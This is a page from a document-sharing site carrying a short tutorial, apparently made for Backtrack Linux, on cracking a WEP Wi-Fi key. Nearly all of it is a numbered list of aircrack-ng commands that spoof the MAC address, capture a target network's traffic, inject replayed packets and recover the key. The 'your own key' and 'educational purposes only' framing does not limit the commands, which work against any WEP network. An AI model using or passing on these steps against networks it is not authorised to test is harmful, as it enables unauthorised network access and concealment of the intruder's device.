Backtrack

  • May 2020
  • PDF

This document was uploaded by user and they confirmed that they have the permission to share it. If you are author or own the copyright of this book, please report to us by using this DMCA report form. Report DMCA


Overview

Download & View Backtrack as PDF for free.

More details

  • Words: 98
  • Pages: 1
This is a tutorial on how to crack your own WEP key. Used for educational purposes only Please note: The eth1 is most of the steps is my wireless device, you must replace the eth1 with your own info - you will see how in the video.

1)airmon-ng stop eth1 2)ifconfig eth1 down 3)macchanger --mac 00:11:22:33:44:55 eth1 4)airmon-ng start eth1 5)airodump-ng eth1 6)airodump-ng -c (channel) -w (file name) --BSSID (BSSID) eth1 new shell 7)aireplay-ng -1 0 -a (BSSID) -h 00:11:22:33:44:55 eth1 8)aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 eth1 after 10,000 packets

open new shell

9)aircrack-ng -b (BSSID) (filename-01.cap)

Related Documents

Backtrack
December 2019 10
Backtrack
May 2020 7
Backtrack
June 2020 9
Backtrack
May 2020 10
Backtrack Install
June 2020 7